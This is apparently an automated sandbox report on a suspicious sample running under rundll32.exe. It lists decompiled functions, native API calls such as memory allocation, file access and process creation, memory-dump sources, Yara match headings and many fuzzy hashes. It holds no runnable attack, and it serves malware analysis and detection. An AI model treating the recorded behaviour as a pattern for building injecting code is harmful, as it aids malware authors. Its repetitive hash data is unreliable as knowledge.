Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 52eaa5a51ed99d266170a3dabd7f77a011bc5a8c94b10a6a56c6bf34f3435316
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 97B01233C10450CFCF02EF40DA10B197331FB40750F154490A00127931C22CAC11DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00FAFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FAFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00F5CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00FA5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00FA5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x00fafdda
0x00fafde2
0x00fafde5
0x00fafdec
0x00fafdfa
0x00fafdff
0x00fafe0a
0x00fafe0f
0x00fafe17
0x00fafe1e
0x00fafe19
0x00fafe19
0x00fafe19
0x00fafe20
0x00fafe21
0x00fafe22
0x00fafe25
0x00fafe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FAFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FAFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FAFE01

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: ce7f2d178728b157a308f42a31498d4815cf2aff6b671630def45e6b4210cff7
Instruction ID: 18ebd43937fdbafa38dca53c76c29bd319c1f2a3bd9066053c6d97313bea89f0
Opcode Fuzzy Hash: ce7f2d178728b157a308f42a31498d4815cf2aff6b671630def45e6b4210cff7
Instruction Fuzzy Hash: 5DF0FC725006017FD6201A45DC46F37BF5ADB45730F244315F618551E1EA62F820B6F5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6904 Parent PID: 3472 rundll32.exeCOMMON

Executed Functions

Function 00F79D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00F74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00F74B87,007A002E,00000000,00000060,00000000,00000000), ref: 00F79DAD

Strings

.z`, xrefs: 00F79D9D, 00F79DA8

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: b9504bc1226a9fc782565508341bd4f1c1acc302dc856902b52175d14b2939b0
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 84F0B2B2200208ABCB48CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F79D5A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00F74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00F74B87,007A002E,00000000,00000060,00000000,00000000), ref: 00F79DAD

Strings

.z`, xrefs: 00F79D9D, 00F79DA8

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 8526263a9d86fe8db03230301bbabf022aae20fe410316903bfa2187470fd3dc
Instruction ID: 2e4458d3bdac150be83c901a257425bbe47eb813ab626cd41947f19742292b5c
Opcode Fuzzy Hash: 8526263a9d86fe8db03230301bbabf022aae20fe410316903bfa2187470fd3dc
Instruction Fuzzy Hash: ACF0B6B2210108AFDB48CF88DC95DEB77BDAF8C744F15825DBA0D97251C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00F79E0A, Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00F74D42,5EB6522D,FFFFFFFF,00F74A01,?,?,00F74D42,?,00F74A01,FFFFFFFF,5EB6522D,00F74D42,?,00000000), ref: 00F79E55

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0904214d0094a6a731e947f72d220e33c7149a6e8a60413121bc8f7f69fe2d4a
Instruction ID: bd042ae9a54b72f182e5cb207e0b1c4087dfcff9302b8dbb1103856e9ded07f2
Opcode Fuzzy Hash: 0904214d0094a6a731e947f72d220e33c7149a6e8a60413121bc8f7f69fe2d4a
Instruction Fuzzy Hash: DFF0F4B2200108AFCB14CF99DC80EEB77ADEF8C354F168648FA0DA7241D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F79E10, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00F74D42,5EB6522D,FFFFFFFF,00F74A01,?,?,00F74D42,?,00F74A01,FFFFFFFF,5EB6522D,00F74D42,?,00000000), ref: 00F79E55

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: d0f36bfc8fda827878e82e0b099d43c79dba14eaed257ed77803fc8fdaa15bca
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 71F0BDB2200108AFCB14DF89DC81DEB77ADEF8C754F158249BE1D97241D630E811CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F79F3A, Relevance: 1.5, APIs: 1, Instructions: 33memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F62D11,00002000,00003000,00000004), ref: 00F79F79

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: d8994ef335fb81c265a03167fa06d4f00b96a4e15c586b72665d9a71e1ac456d
Instruction ID: 8fe670c3895a82615a32c269c08e05749891f4491c45128d6bd21261616cc8a0
Opcode Fuzzy Hash: d8994ef335fb81c265a03167fa06d4f00b96a4e15c586b72665d9a71e1ac456d
Instruction Fuzzy Hash: 51F0F8B2200108AFDB14DF99CC81EEB77AAFF88750F158259FA4DA7241D634E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F79F40, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00F62D11,00002000,00003000,00000004), ref: 00F79F79

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 3704726544815e59018cabc3d8f2b60e4ae57f45c416550da8fedbc775dcdc08
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: CBF015B2200208ABCB14DF89CC81EAB77ADEF88750F118149BE08A7241C630F810CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F79E90, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00F74D20,?,?,00F74D20,00000000,FFFFFFFF), ref: 00F79EB5

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 4aaab624b0b9e0197cfbb3fe37c282ea962bbe2dfb2f8fdbcec4368955592ee6
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 80D012752002146BD710EB98CC85E97776DEF44750F158455BA5C5B242C530F51086E1

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD986A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b439d9337f305bcfa59457a3b4163dc30009d2978986f2f57e2cd09f8165e7a2
Instruction ID: 101f975b4055d1edba64d44dff13325b249e4f617abb43ccdd3a4501e8b18e03
Opcode Fuzzy Hash: b439d9337f305bcfa59457a3b4163dc30009d2978986f2f57e2cd09f8165e7a2
Instruction Fuzzy Hash: E090027124100513F111615F4904727000997D02C6F91C412A4416598D9696D953B161

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD984A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e73f9db465533c0808978999768e4e65da4dcf3df9ab8cecbda33c0c1c8fa5e1
Instruction ID: 48ee7ca5b53dbca024ea33a0aff4a87ac3976ad33b444c23f7371e6e0cc70ef3
Opcode Fuzzy Hash: e73f9db465533c0808978999768e4e65da4dcf3df9ab8cecbda33c0c1c8fa5e1
Instruction Fuzzy Hash: 76900261282042527545B15F48045274006A7E02C6791C012A5406990C8566E857E661

Uniqueness

Uniqueness Score: -1.00%

Function 04FD95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD95DA

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6949b985f2fe242ce61dc56c428aa726561b0f60efd3f062e0a6c28ba757747
Instruction ID: fd78b5a634c80b9248509f2bb45aa3fced03348b00566933dc87c99109706176
Opcode Fuzzy Hash: b6949b985f2fe242ce61dc56c428aa726561b0f60efd3f062e0a6c28ba757747
Instruction Fuzzy Hash: 9F9002A1242001036105715F4814636400A97E0286B51C021E50065D0DC565D8927165

Uniqueness

Uniqueness Score: -1.00%

Function 04FD99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD99AA

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5aec5161679fc79b9f352ec7ed24629dd010f6b24c0d9e8f6ddac938b394e88d
Instruction ID: 9527816b0bdff73ed1feff45052fc2644f8aa315f5545aff1ef8489af8a44e39
Opcode Fuzzy Hash: 5aec5161679fc79b9f352ec7ed24629dd010f6b24c0d9e8f6ddac938b394e88d
Instruction Fuzzy Hash: E39002A138100542F100615F4814B260005D7E1386F51C015E5056594D8659DC537166

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD954A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 251fb5f0a386b96752f5a657331679c091d6f7e7d84ff4e7cc63b550487ea806
Instruction ID: d8175043a092746f085fd286afadf2814bd748b18f7760b016caba1329b0b093
Opcode Fuzzy Hash: 251fb5f0a386b96752f5a657331679c091d6f7e7d84ff4e7cc63b550487ea806
Instruction Fuzzy Hash: 5D900265251001032105A55F0B04527004697D53D6351C021F5007590CD661D8626161

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD991A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f4b7969ed5b78c3857ea7ed2224ca4bf59eefcc9922658a1f1ebf256c41ad347
Instruction ID: eea357a0a4e2584d9a605cee86da9100da36bcfdd25d21f73e31d0a4c075ba18
Opcode Fuzzy Hash: f4b7969ed5b78c3857ea7ed2224ca4bf59eefcc9922658a1f1ebf256c41ad347
Instruction Fuzzy Hash: DD9002B124100502F140715F4804766000597D0386F51C011A9056594E8699DDD676A5

Uniqueness

Uniqueness Score: -1.00%

Function 04FD96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD96EA

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c1ca946432aa35559b942f4adf404e8163b87c1de046f1c379882bb03c8971a2
Instruction ID: faf51e27412ecea44f68dc0a73ab59819f62475c2ace86087fd649b0c1c990ad
Opcode Fuzzy Hash: c1ca946432aa35559b942f4adf404e8163b87c1de046f1c379882bb03c8971a2
Instruction Fuzzy Hash: 1F90027124108902F110615F880476A000597D0386F55C411A8416698D86D5D8927161

Uniqueness

Uniqueness Score: -1.00%

Function 04FD96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD96DA

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf043bec13d89b965058f74213f94db14c951d32019f95f433b56be81dccf93
Instruction ID: 325b4ef94abf5bea302cf6f6cf9f557a910ba3ded7bb7c836fcaf6a7b02ebaf1
Opcode Fuzzy Hash: 5cf043bec13d89b965058f74213f94db14c951d32019f95f433b56be81dccf93
Instruction Fuzzy Hash: 7590027124100942F100615F4804B66000597E0386F51C016A4116694D8655D8527561

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD966A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b5a142fdb0eb123765a185e820475554fc9b86b9a280ad7b307745d1e8ecdeae
Instruction ID: 86ea4c5f3f5554e1d389917d3ea92b4e7526c8e5adddc4d362e42d5561da5c80
Opcode Fuzzy Hash: b5a142fdb0eb123765a185e820475554fc9b86b9a280ad7b307745d1e8ecdeae
Instruction Fuzzy Hash: 0A90027124100902F180715F480466A000597D1386F91C015A4017694DCA55DA5A77E1

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD965A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8a028ab64bca542a35f8d90c2cae19fab5bed596e1d27087f854b1d084e934ca
Instruction ID: 3b107bedf77ede4d0504894f9a29d427951bc1481457d1bbb9affd0282483bad
Opcode Fuzzy Hash: 8a028ab64bca542a35f8d90c2cae19fab5bed596e1d27087f854b1d084e934ca
Instruction Fuzzy Hash: 7E90027124504942F140715F4804A66001597D038AF51C011A40566D4D9665DD56B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD9A5A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 23da830a4057d20bd610870fca6b84c4344ba07b0104e4e2983ecd0d243be2a4
Instruction ID: 78c603ed343295921495b44a4bf4e5c1ab3056278516af2a006966c1409f01ac
Opcode Fuzzy Hash: 23da830a4057d20bd610870fca6b84c4344ba07b0104e4e2983ecd0d243be2a4
Instruction Fuzzy Hash: 5B90026125180142F200656F4C14B27000597D0387F51C115A4146594CC955D8626561

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD9FEA

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 491528015d1df48dd801df4790093aa53c93abeb7215088764c3d0cc55e23afc
Instruction ID: dd05676c0a0a07883f73cf577da323ce7fbd2a271e722d4e47a80428b4a42c60
Opcode Fuzzy Hash: 491528015d1df48dd801df4790093aa53c93abeb7215088764c3d0cc55e23afc
Instruction Fuzzy Hash: 2390027135114502F110615F8804726000597D1286F51C411A4816598D86D5D8927162

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD978A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cb778114361953f03a893f625eeb1001d64304d6a8394a9799a25ab14142767a
Instruction ID: 785fa0c5067ebe7661ea3ea90812b350ffaff25500c07fc3503f5b7d4cb10af7
Opcode Fuzzy Hash: cb778114361953f03a893f625eeb1001d64304d6a8394a9799a25ab14142767a
Instruction Fuzzy Hash: ED90026925300102F180715F580862A000597D1287F91D415A4007598CC955D86A6361

Uniqueness

Uniqueness Score: -1.00%

Function 04FD9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04FD971A

Memory Dump Source

Source File: 0000000F.00000002.504196536.0000000004F70000.00000040.00000001.sdmp, Offset: 04F70000, based on PE: true

Associated: 0000000F.00000002.505096584.000000000508B000.00000040.00000001.sdmp Download File
Associated: 0000000F.00000002.505143843.000000000508F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b908d499ed2e97b1da4d8ae0eed7e0ce52d6f695de4a6cdebf0726382c97e520
Instruction ID: 97c77cfe45ccee7fbb0cb02099c28afc37f616ef96076278bbcc4a569b3be7f1
Opcode Fuzzy Hash: b908d499ed2e97b1da4d8ae0eed7e0ce52d6f695de4a6cdebf0726382c97e520
Instruction Fuzzy Hash: 0390027124100502F100659F5808666000597E0386F51D011A9016595EC6A5D8927171

Uniqueness

Uniqueness Score: -1.00%

Function 00F7A0A2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00F63AF8), ref: 00F7A09D

Strings

U, xrefs: 00F7A0A9

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: U
API String ID: 3298025750-3372436214
Opcode ID: fd6a2b2aed92f29c5d507c8bee11bcef5e009870ee05968a564e64aab02de800
Instruction ID: 8662a2b690bc7e65aa65c82df8e2434ffcdab4fb8e3ad5998c244f1b8aefff4e
Opcode Fuzzy Hash: fd6a2b2aed92f29c5d507c8bee11bcef5e009870ee05968a564e64aab02de800
Instruction Fuzzy Hash: E1F0E2716082547FD720EFA49C81EEB7B6CDF85B20F1584AAF98C9F247C530A50587E2

Uniqueness

Uniqueness Score: -1.00%

Function 00F7A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00F63AF8), ref: 00F7A09D

Strings

.z`, xrefs: 00F7A08C, 00F7A098

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: fb90ae4f9eb3f3ac1b2f08f48f9e651dd5aaadebb12814ffff214de25ed1cfb9
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: F3E04FB12002086BD714DF59CC45EA777ADEF88750F018555FE0C57241C630F910CAF1

Uniqueness

Uniqueness Score: -1.00%

Function 00F682E8, Relevance: 3.1, APIs: 2, Instructions: 57threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00F6834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00F6836B

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4adf284a7a0c8eff105667c9da61a855bc41c97b858e751c65a6fdf532cb0eeb
Instruction ID: 59fb9e0893206519d3116a3a01b392e5b271b6d605874f628e5fd2a416957609
Opcode Fuzzy Hash: 4adf284a7a0c8eff105667c9da61a855bc41c97b858e751c65a6fdf532cb0eeb
Instruction Fuzzy Hash: AA01D831A802187BE720A6949C43FBE776C6B00B55F154159FF04BA1C1D6D8A90657E6

Uniqueness

Uniqueness Score: -1.00%

Function 00F682F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00F6834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00F6836B

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction ID: 7c87bdfe00666760bf670d405f09b73b2b4ee04b87962c60cdeee826a8690df7
Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
Instruction Fuzzy Hash: 8401A731A802287BE720A6949C43FBE776C6B40F51F154159FF04BA1C1EAD8690666F6

Uniqueness

Uniqueness Score: -1.00%

Function 00F7A0DD, Relevance: 1.6, APIs: 1, Instructions: 66processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00F7A134

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 036ecc63bcd005bbcab80a9b3f0a43ff64fe6c05a20eb5be2c15438e78a80a0f
Instruction ID: 3d5fb126214fb132b57e2a2526e8ba2be33febffaa3fac6e7a499006d035de40
Opcode Fuzzy Hash: 036ecc63bcd005bbcab80a9b3f0a43ff64fe6c05a20eb5be2c15438e78a80a0f
Instruction Fuzzy Hash: F811DAB2200208ABDB14DF99DC81EEB37ADAF8C750F158259FA4DA7241C630E9118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F7A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00F7A134

Memory Dump Source

Source File: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, Offset: 00F60000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 7656a73721d5a56bc3a006e688a7d473632ca1e9613469b5a12b569d5334a721
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8501B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA5

Uniqueness

